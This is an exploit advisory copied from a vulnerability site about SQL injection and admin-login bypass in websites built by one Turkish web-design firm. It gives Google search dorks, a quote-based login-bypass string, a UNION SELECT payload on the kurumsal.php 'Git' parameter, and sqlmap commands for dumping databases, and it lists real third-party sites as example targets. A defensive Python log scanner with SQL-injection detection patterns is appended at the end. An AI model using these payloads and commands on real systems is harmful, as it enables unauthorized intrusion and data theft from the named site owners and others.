*.ozgunwebtasarim.com & yardim.php SQL Injection / Login Bypass

CVE               : N/A
Category          : CWE-89
Price             : N/A
Severity          : High
Author            : Unknown
Risk              : High
Exploitation Type : Remote
Date              : 2018-10-08
CVSS              : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS              : 0.02192
EPSSP             : 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018100073

Below is a copy:

*.ozgunwebtasarim.com & yardim.php SQL Injection / Login Bypass
--------------------------------------------------------------------------
yardim.php Login Bypass
---------------------------------------------------------------------------

yardim.php Login Bypass

Search Google : inurl:yardim.php?id=
Admin Panel : /admin/

Username : ''Or'='Or''
Password : ''Or'='Or''

Success !

E.g
http://huzuremlakafyon.com/admin
http://aybarsemlak.org/admin

----------------------------------------------------------------------------
site:*.ozgunwebtasarim.com SQL Injection
----------------------------------------------------------------------------

Search Google : site:*.ozgunwebtasarim.com

Admin Panel : /admin/

SQL Injection : *.ozgunwebtasarim.com/kurumsal.php?Git=1

Payload : 

Parameter: Git (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: Git=-6974' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qkqkq','yNrZwiHhedjAEgVaHVnBWOyZJiSMABOLwvkuTEoa'),'qzzkq'),NULL,NULL-- LayN

SQLMap Config : sqlmap.py -u *.ozgunwebtasarim.com/kurumsal.php?Git=1 -D ozgunweb_* --level=5 --risk=3 --no-cast --tables

sqlmap.py -u *.ozgunwebtasarim.com/kurumsal.php?Git=1 --level=5 --risk=3 --no-cast --dbs

E.g

http://ilicaakpinarotel.ozgunwebtasarim.com/kurumsal.php?Git=1
http://yiksan.ozgunwebtasarim.com/kurumsal.php?Git=1
http://www.ozgunwebtasarim.com/kurumsal.php?Git=1

----------------------------------------------------------------------------------------------------
                                         
GOD3ERR COMMUNIST HACKER - FREEDOM TURKEY !
                                         
----------------------------------------------------------------------------------------------------
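
For site owners checking whether the `Git` parameter described above has been probed, the following added example (not part of the advisory or of the affected application) scans web access logs for non-numeric or UNION-style values. It assumes combined-format logs and that `Git` only ever carries a small integer, as in `kurumsal.php?Git=1`; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: these parameters only ever carry a small non-negative integer,
# as in the page's kurumsal.php?Git=1. Extend the map for other scripts.
NUMERIC_PARAMS = {"/kurumsal.php": "Git"}

# Client address, request target and status from a combined-format log entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# SQL metacharacters and the UNION SELECT shape, matched after URL decoding.
SQLI_RE = re.compile(r"union\s+(?:all\s+)?select|--|/\*|'", re.I)

def classify(target):
    """Return 'ok', 'malformed', 'sqli' or 'ignored' for one request target."""
    parts = urlsplit(target)
    param = NUMERIC_PARAMS.get(parts.path)
    if param is None:
        return "ignored"
    # parse_qs percent-decodes, so %27 and %20 are seen as ' and space.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if not re.fullmatch(r"\d{1,10}", value):
            return "sqli" if SQLI_RE.search(value) else "malformed"
    return "ok"

def scan(log_text):
    """Return (client, status, verdict) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group(2))
        if verdict in ("sqli", "malformed"):
            hits.append((m.group(1), int(m.group(3)), verdict))
    return hits

# Constructed sample log; the addresses are documentation-range placeholders.
SAMPLE_LOG = """\
198.51.100.4 - - [08/Oct/2018:10:00:01 +0000] "GET /kurumsal.php?Git=1 HTTP/1.1" 200 5120
203.0.113.9 - - [08/Oct/2018:10:00:07 +0000] "GET /kurumsal.php?Git=-6974%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20x HTTP/1.1" 200 5301
203.0.113.9 - - [08/Oct/2018:10:00:09 +0000] "GET /kurumsal.php?Git=1%20uNiOn%0aSeLeCt%201 HTTP/1.1" 500 312
198.51.100.7 - - [08/Oct/2018:10:00:12 +0000] "GET /kurumsal.php?Git=abc HTTP/1.1" 200 4100
198.51.100.7 - - [08/Oct/2018:10:00:15 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves closer review than one with 500, since the injected query may have returned data. The same integer check applied in the application before the value reaches the database, together with parameterized queries, removes the injection point itself.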
